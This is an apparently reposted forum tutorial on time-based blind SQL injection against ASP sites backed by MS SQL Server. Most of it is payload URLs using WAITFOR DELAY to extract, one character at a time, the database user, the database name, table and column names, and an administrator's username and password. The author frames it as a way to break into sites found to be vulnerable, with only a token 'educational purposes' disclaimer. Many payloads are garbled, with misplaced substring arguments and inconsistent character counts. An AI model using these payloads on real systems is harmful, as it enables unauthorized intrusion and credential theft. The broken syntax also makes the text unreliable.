Basic blind SQL Injection using (TIME DELAY)

Basic blind note technique Time Delay
 
Blind SQL Injection. (time delay)
 
For educational purposes only!
Hellow, HF users.
Since no one took the time and effort to make a decent time delay tutorial I'm doing it.
First of all what do you need.
 
A vulnerable only to blind SQL injection. asp webstite.
Notepad, to store data you collect while injecting.
And loads of spare time.
 
Finding vulnerable sites: -- Kobez expanding vulnerable collection guide! --
 
The 2 kinds of time delay injection.
 
Integer injection:
 
Code:
Www.2cto.com/index. asp? Id = 1; waitfor delay '00: 00: 10 '--
So this line sais that satabase has to wait for 10 seconds before he responds.
 
If the database returns directly, we know its false.
If it waits 10 seconds its "true" obvious.
 
String injection:
Code:
Www.2cto.com/index. asp? Id = 1'; waitfor delay '00: 00: 10 '--
Same thing here only the quote came whit 'as in basic sqli when u have a string injection.
 
Extracting the database username.
 
Wel. we have alot of work to do.
We need to find all characters. lets start whit one:
Code:
Www.2cto.com/index. asp? Id = 1; IF (len (user) = 1) waitfor delay '00: 00: 10 '--
Lets explain first. we ask: if (len (user) = 1) so we ask is user has one character. waitfor delay '00: 00: 10'
Database needs to wait 10 seconds to respond. but we all know in most cases a user is not 1 char.
 
We will encrease (len (user) = 1) to (len (user) = 2) and so on.
 
Code:
Www.2cto.com/index. asp? Id = 1; IF (len (user) = 1) waitfor delay '00: 00: 10' -- [no Delay from db.]
Www.2cto.com/index. asp? Id = 1; IF (len (user) = 2) waitfor delay '00: 00: 10' -- [no delay from db.]
Www.2cto.com/index. asp? Id = 1; IF (len (user) = 1) waitfor delay '00: 00: 10' -- [no delay from db.]
Www.2cto.com/index. asp? Id = 1; IF (len (user) = 1) waitfor delay '00: 00: 10' -- [page waites 10 seconds before it loads.]
 
We have a hit. database just told us by waiting 10 seconds that user has 4 characters.
But what are the characters we seek? :/
 
Get characters whit ascii and time delay.
As we have seen in my previous tutorial. we are going to use ascii.
These will help us get the characters of the username.
 
97 inascii is the letter A we will encrease this count untill we get a hit.
For example 97 A, 98 B, 99 C, and so on.
 
How do we do this.
 
Code:
Www [site]. com/index. asp? Id = 1; IF (ascii (lower (substring (user), 1, 1)> 97) waitfor delay '00: 00: 10 '--
What did I just say.
If ascii (character code) from user
1, 1 (this means 1rst character) is 97 which is an in ascii is correct. the database wowould wait 10 seconds befor ethe page loads.
 
We need 4 character so the 1,1 needs to be encreased. if we want the second character we need to do 2, 1.
 
First character:
Code:
Www [site]. com/index. asp? Id = 1; IF (ascii (lower (substring (user), 1, 1)> 97) waitfor delay '00: 00: 10' -- [no delay]
Www [site]. com/index. asp? Id = 1; IF (ascii (lower (substring (user), 1,1)> 98) waitfor delay '00: 00: 10' -- [no delay]
Www [site]. com/index. asp? Id = 1; IF (ascii (lower (substring (user), 1,1)> 99) waitfor delay '00: 00: 10' -- [no delay]
Www [site]. com/index. asp? Id = 1; IF (ascii (lower (substring (user), 100)>) waitfor delay '00: 00: 10' -- [no delay]
Www [site]. com/index. asp? Id = 1; IF (ascii (lower (substring (user), 101)>) waitfor delay '00: 00: 10' -- [10 second delay]
 
The first character is a E. how do I know this:
At 97 I had no delay which means its not an
At 98 I had none either
Not at 99, not at 100
But I did have a 10 second delay at 101. and 101 is E in achii char code.
 
We need 4 more characters.
Code:
Www [site]. com/index. asp? Id = 1; IF (ascii (lower (substring (user), 2, 1)> 97) waitfor delay '00: 00: 10' -- [no delay]
Www [site]. com/index. asp? Id = 1; IF (ascii (lower (substring (user), 2, 1)> 98) waitfor delay '00: 00: 10' -- [no delay]
Www [site]. com/index. asp? Id = 1; IF (ascii (lower (substring (user), 2, 1)> 99) waitfor delay '00: 00: 10' -- [10 second delay]
 
Second character is a C
Look closely at what changed at the code. instead of it is because I wanted to know the second character of user.
 
Third character:
Code:
Www [site]. com/index. asp? Id = 1; IF (ascii (lower (substring (user), 3,1)> 97) waitfor delay '00: 00: 10' -- [no delay]
Www [site]. com/index. asp? Id = 1; IF (ascii (lower (substring (user), 3,1)> 98) waitfor delay '00: 00: 10' -- [no delay]
Www [site]. com/index. asp? Id = 1; IF (ascii (lower (substring (user), 3,1)> 99) waitfor delay '00: 00: 10' -- [no delay]
Www [site]. com/index. asp? Id = 1; IF (ascii (lower (substring (user), 100)>) waitfor delay '00: 00: 10' -- [no delay]
Www [site]. com/index. asp? Id = 1; IF (ascii (lower (substring (user), 101)>) waitfor delay '00: 00: 10' -- [no delay]
Www [site]. com/index. asp? Id = 1; IF (ascii (lower (substring (user), 102)>) waitfor delay '00: 00: 10' -- [10 second delay]
 
Third is an F yet again watch the code I changed 2, 1 in 3, 1.
 
Fourth
Code:
Www [site]. com/index. asp? Id = 1; IF (ascii (lower (substring (user), 4,1)> 97) waitfor delay '00: 00: 10' -- [no delay]
Www [site]. com/index. asp? Id = 1; IF (ascii (lower (substring (user), 4,1)> 98) waitfor delay '00: 00: 10' -- [no delay]
Www [site]. com/index. asp? Id = 1; IF (ascii (lower (substring (user), 4,1)> 99) waitfor delay '00: 00: 10' -- [no delay]
Www [site]. com/index. asp? Id = 1; IF (ascii (lower (substring (user), 100)>) waitfor delay '00: 00: 10' -- [no delay]
Www [site]. com/index. asp? Id = 1; IF (ascii (lower (substring (user), 101)>) waitfor delay '00: 00: 10' -- [no delay]
Www [site]. com/index. asp? Id = 1; IF (ascii (lower (substring (user), 102)>) waitfor delay '00: 00: 10' -- [10 second delay]
 
Fourth character is yet again an F.
 
We now have the four characters I needed:
ECFF = user.
 
What a hell of a job for 4 characters...
No, no we are not finished yet.
 
Extracting the db name.
Same as before database wants us to have a hell of a job, its a bitch.
Now lets hope that god damn administrator likes short names (they dont)
 
We need to know how many characters the db name hase. not much difference.
Code:
Www [site]. com/index. asp? Id = 1; if (len (db_name () = 1) waitfor delay '00: 00: 10' -- [no delay]
I said database: does db_name have only one character? Database said no my admin hates that.
So we need to run down the whole thing again. changing the = 1 into = 2, = 3 and so on.
Untill he waites 10 seconds.
 
Code:
Www [site]. com/index. asp? Id = 1; if (len (db_name () = 3) waitfor delay '00: 00: 10' -- [10 second delay]
Our db name has 3 characters (in real cases they will probebly end up in 8 or 10 characters.
But this is a tutorial. I wont type a milion characters. if you did not get it by now XD sorry for you.
 
First character.
Code:
Www [site]. com/index. asp? Id = 1; IF (ascii (lower (substring (db_name), 1, 1)> 97) waitfor delay '00: 00: 10' -- [no delay]
Www [site]. com/index. asp? Id = 1; IF (ascii (lower (substring (db_name), 1,1)> 98) waitfor delay '00: 00: 10' -- [no delay]
Www [site]. com/index. asp? Id = 1; IF (ascii (lower (substring (db_name), 1, 1)> 99) waitfor delay '00: 00: 10' -- [10 second delay]
 
First character is C
 
Code:
Www [site]. com/index. asp? Id = 1; IF (ascii (lower (substring (db_name), 2, 1)> 97) waitfor delay '00: 00: 10' -- [no delay]
Www [site]. com/index. asp? Id = 1; IF (ascii (lower (substring (db_name), 2, 1)> 98) waitfor delay '00: 00: 10' -- [no delay]
Www [site]. com/index. asp? Id = 1; IF (ascii (lower (substring (db_name), 2, 1)> 99) waitfor delay '00: 00: 10' -- [no delay]
Www [site]. com/index. asp? Id = 1; IF (ascii (lower (substring (db_name), 100)>) waitfor delay '00: 00: 10' -- [no delay]
Www [site]. com/index. asp? Id = 1; IF (ascii (lower (substring (db_name), 101)>) waitfor delay '00: 00: 10' -- [10 second delay]
 
Second character is an E watch the limit again 1, 1 changed to 2, 1.
 
Code:
Www [site]. com/index. asp? Id = 1; IF (ascii (lower (substring (db_name), 3,1)> 97) waitfor delay '00: 00: 10' -- [no delay]
Www [site]. com/index. asp? Id = 1; IF (ascii (lower (substring (db_name), 3,1)> 98) waitfor delay '00: 00: 10' -- [no delay]
Www [site]. com/index. asp? Id = 1; IF (ascii (lower (substring (db_name), 3,1)> 99) waitfor delay '00: 00: 10' -- [no delay]
Www [site]. com/index. asp? Id = 1; IF (ascii (lower (substring (db_name), 100)>) waitfor delay '00: 00: 10' -- [no delay]
Www [site]. com/index. asp? Id = 1; IF (ascii (lower (substring (db_name), 101)>) waitfor delay '00: 00: 10' -- [10 second delay]
 
Last letter is another E
Db_name = CEE
 
Extracting database tables
The principal remains the same.
It is easy. but if you want to go out door once in a while.
Avoid blind sqli ..
 
We need to know how mutch characters it hase ans we need to know what characters it has.
By now you shoshould know the drill.
 
This one has 5 characters.
Code:
Www [site]. com/index. asp? Id = 1; if (len (select top 1 name from sysobjects where xtype = 'U') = 5) waitfor delay '00: 00: 10' -- [10 second delay]
 
We need to know the characters.
 
Code:
First is an U.
Http: // [site]/page. asp? Id = 1; IF (ASCII (lower (substring (select top 1 NAME from sysobjects where xtype = char (85), 117) =) waitfor delay '00: 00: 10' -- (+ 10 seconds)
 
Second an S.
Http: // [site]/page. asp? Id = 1; IF (ASCII (lower (substring (select top 1 NAME from sysobjects where xtype = char (85), 115) =) waitfor delay '00: 00: 10' -- (+ 10 seconds)
 
Third an E.
Http: // [site]/page. asp? Id = 1; IF (ASCII (lower (substring (select top 1 NAME from sysobjects where xtype = char (85), 101) =) waitfor delay '00: 00: 10' -- (+ 10 seconds)
 
Fourth an R.
Http: // [site]/page. asp? Id = 1; IF (ASCII (lower (substring (select top 1 NAME from sysobjects where xtype = char (85), 114) =) waitfor delay '00: 00: 10' -- (+ 10 seconds)
 
Th an S.
Http: // [site]/page. asp? Id = 1; IF (ASCII (lower (substring (select top 1 NAME from sysobjects where xtype = char (85), 5, 1) = 115) waitfor delay '00: 00: 10' -- (+ 10 seconds)
 
Table name is USERS.
 
Extracting table column names.
 
How many characters does this column have. we know how it works ppl.
Code:
Www.2cto.com/index. asp? Id = 1; IF (len (select top 1 column_name from CEE. information_schema.columns where table_name = 'users') = 8) waitfor delay '00: 00: 10' -- [10 second delay]
OK here we say we select the column name from database (thats the name we had at start DB_NAME) this one is CEE. we select this out of the table users we had abve this part.
It has 8 characters.
 
Now we need the characters to create the name.
Code:
First letter is U
Www.2cto.com/index. asp? Id = 1; IF (ASCII (lower (substring (select top 1 column_name from CEE. information_schema.columns where table_name = 'users'), 117) =) waitfor delay '00: 00: 10 '--
 
Second letter is an S.
Www.2cto.com/index. asp? Id = 1; IF (ASCII (lower (substring (select top 1 column_name from CEE. information_schema.columns where table_name = 'users'), 115) =) waitfor delay '00: 00: 10 '--
 
Third letter is an E.
Www.2cto.com/index. asp? Id = 1; IF (ASCII (lower (substring (select top 1 column_name from CEE. information_schema.columns where table_name = 'users'), 3, 1) = 101) waitfor delay '00: 00: 10 '--
 
Fourth letter is an R.
Www.2cto.com/index. asp? Id = 1; IF (ASCII (lower (substring (select top 1 column_name from CEE. information_schema.columns where table_name = 'users'), 114) =) waitfor delay '00: 00: 10 '--
 
Th letter is an n.
Www.2cto.com/index. asp? Id = 1; IF (ASCII (lower (substring (select top 1 column_name from CEE. information_schema.columns where table_name = 'users'), 5, 1) = 110) waitfor delay '00: 00: 10 '--
 
Second letter is an.
Www.2cto.com/index. asp? Id = 1; IF (ASCII (lower (substring (select top 1 column_name from CEE. information_schema.columns where table_name = 'users'), 6, 1) = 97) waitfor delay '00: 00: 10 '--
 
Second letter is an m.
Www.2cto.com/index. asp? Id = 1; IF (ASCII (lower (substring (select top 1 column_name from CEE. information_schema.columns where table_name = 'users'), 111) =) waitfor delay '00: 00: 10 '--
 
Second letter is an e.
Www.2cto.com/index. asp? Id = 1; IF (ASCII (lower (substring (select top 1 column_name from CEE. information_schema.columns where table_name = 'users'), 8, 1) = 101) waitfor delay '00: 00: 10 '--
 
Column name is username.
 
Now we need to extract the others. in some cases you cocould have up to 10.
Lets say I only have 2 username and pass to keep it easy.
 
The second column name hase 4 characters.
Code:
Www.2cto.com/index. asp? Id = 1; IF (LEN (select top 1 column_name from CEE. information_schema.columns where table_name = 'users' and column_name> 'user') = 4) waitfor delay '00: 00: 10 '--
 
The charracters:
Code:
First letter is P.
Www.2cto.com/index. asp? Id = 1; IF (ASCII (lower (substring (select top 1 column_name from CEE. information_schema.columns where table_name = 'users' and column_name> 'username'), 112) =) waitfor delay '00: 00: 10 '--
 
Second letter is.
Www.2cto.com/index. asp? Id = 1; IF (ASCII (lower (substring (select top 1 column_name from CEE. information_schema.columns where table_name = 'users' and column_name> 'username'), 2, 1) = 97) waitfor delay '00: 00: 10 '--
 
Third letter is S.
Www.2cto.com/index. asp? Id = 1; IF (ASCII (lower (substring (select top 1 column_name from CEE. information_schema.columns where table_name = 'users' and column_name> 'username'), 115) =) waitfor delay '00: 00: 10 '--
 
Forth letter is S.
Www.2cto.com/index. asp? Id = 1; IF (ASCII (lower (substring (select top 1 column_name from CEE. information_schema.columns where table_name = 'users' and column_name> 'username'), 115) =) waitfor delay '00: 00: 10 '--
 
So we now have the column pass.
 
Looks like we finally get somewhere.
We have column username and pass! Yay.
But not yet there not yet.
 
Extracting rows from columns.
 
Extracting from column username.
 
Count of characters: 5
Code:
Www.2cto.com/index. asp? Id = 1; IF (LEN (select top 1 username from USERS) = 5) waitfor delay '00: 00: 10 '--
What do we do here? We select whats in the column username from table users.
 
We need to extract the characters now:
Code:
First letter is.
Www.2cto.com/index. asp? Id = 1; IF (ASCII (substring (select top 1 username from USERS),) = 97) waitfor delay '00: 00: 10 '--
 
Second letter is D.
Www.2cto.com/index. asp? Id = 1; IF (ASCII (substring (select top 1 username from USERS), 100) =) waitfor delay '00: 00: 10 '--
 
Third letter is M.
Www.2cto.com/index. asp? Id = 1; IF (ASCII (substring (select top 1 username from USERS), 3,1) = 109) waitfor delay '00: 00: 10 '--
 
Fourth letter is I.
Www.2cto.com/index. asp? Id = 1; IF (ASCII (substring (select top 1 username from USERS), 4, 1) = 105) waitfor delay '00: 00: 10 '--
 
Fith letter is N.
Www.2cto.com/index. asp? Id = 1; IF (ASCII (substring (select top 1 username from USERS), 5, 1) = 110) waitfor delay '00: 00: 10 '--
 
We now have the name admin. (the one we need .)
 
Extracting from column pass.
 
Code:
Www.2cto.com/index. asp? Id = 1; IF (LEN (select top 1 pass from USERS) = 5) waitfor delay '00: 00: 10 '--
 
We need to extract the characters now:
Code:
First letter is e.
Www.2cto.com/index. asp? Id = 1; IF (ASCII (substring (select top 1 pass from USERS), 101) =) waitfor delay '00: 00: 10 '--
 
Second letter is f.
Www.2cto.com/index. asp? Id = 1; IF (ASCII (substring (select top 1 pass from USERS), 102) =) waitfor delay '00: 00: 10 '--
 
Third letter is f.
Www.2cto.com/index. asp? Id = 1; IF (ASCII (substring (select top 1 pass from USERS), 3, 1) = 102) waitfor delay '00: 00: 10 '--
 
Fourth letter is e.
Www.2cto.com/index. asp? Id = 1; IF (ASCII (substring (select top 1 pass from USERS), 4, 1) = 101) waitfor delay '00: 00: 10 '--
 
Fith letter is c.
Www.2cto.com/index. asp? Id = 1; IF (ASCII (substring (select top 1 pass from USERS), 5, 1) = 99) waitfor delay '00: 00: 10 '--
 
Pass = effec
 
Now we have username: admin and his pass effec.
 
Have fun, see ya in about an houre or 5 when you finish: D
Sorry for the bad english!
And I hope you enjoyed my tutorial. grtz real steel!